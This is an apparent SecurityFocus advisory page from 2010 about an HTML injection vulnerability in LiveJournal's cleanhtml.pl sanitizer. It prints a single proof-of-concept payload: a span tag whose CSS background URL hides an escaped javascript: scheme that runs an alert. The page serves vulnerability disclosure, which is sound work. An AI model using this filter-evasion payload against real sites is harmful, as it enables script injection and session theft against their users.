info
discussion
exploit
solution
references
LiveJournal Cleanhtml.PL HTML Injection Vulnerability
No exploit is required.
Example HTML exploit code has been provided:
<span style="background:url('javas\cript:(function x(){alert("boo")})();');">test</span>
Privacy Statement
Copyright 2010, SecurityFocus
